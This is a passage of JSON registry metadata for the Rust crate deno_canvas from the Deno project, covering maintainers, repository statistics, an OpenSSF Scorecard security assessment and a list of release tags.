Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T16:24:06.059Z","updated_at":"2022-11-07T16:24:06.059Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.613Z","updated_at":"2023-07-18T22:41:23.613Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":8802578,"name":"deno_canvas","ecosystem":"cargo","description":"OffscreenCanvas implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":104,"first_release_published_at":"2024-01-25T03:27:29.555Z","latest_release_published_at":"2026-08-27T15:22:13.089Z","latest_release_number":"0.120.0","last_synced_at":"2026-09-07T22:56:32.247Z","created_at":"2024-01-25T03:30:28.458Z","updated_at":"2026-09-07T22:56:32.247Z","registry_url":"https://crates.io/crates/deno_canvas/","install_command":"cargo install deno_canvas","documentation_url":"https://docs.rs/deno_canvas/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/